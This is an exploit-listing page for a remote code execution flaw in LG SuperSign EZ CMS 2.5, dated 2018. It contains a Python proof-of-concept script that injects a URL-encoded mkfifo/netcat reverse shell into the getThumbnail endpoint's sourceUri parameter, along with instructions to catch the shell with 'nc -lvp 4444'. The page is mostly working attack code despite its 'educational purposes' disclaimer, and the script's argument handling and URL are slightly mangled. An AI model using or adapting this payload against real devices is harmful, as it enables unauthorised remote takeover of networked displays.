Lg supersign ez cms 2.5 remote code execution Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-09-24 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Lg supersign ez cms 2.5 remote code execution is for educational purposes only and if it is used you will do on your own risk!
# 1. Description
# LG SuperSignEZ CMS, that many LG SuperSign TVs have built in, is prone
# to remote code execution due to an improper parameter handling
# 2. Proof of concept
# Code to exploit the vulnerability
import requests
from argparse import ArgumentParser
#LG SupersignEZ always run in port 9080, so in target you must type: #LG_SuperSign_IP:9080
#Example
#supersign-exploit.py -t LG_SuperSign_IP:9080 -l attacker_ip -p 4444
#In the attacker machine wait for the shell with nc -lvp 4444
#enjoy your shell
s = requests.get('[http://'+](http://%27+/) str(args.target).replace('\n', '') +'/qsr_server/device/getThumbnail?sourceUri=\'%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20'+str(args.lhost)+'%20'+str(args.lport)+'%20%3E%2Ftmp%2Ff;\'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150')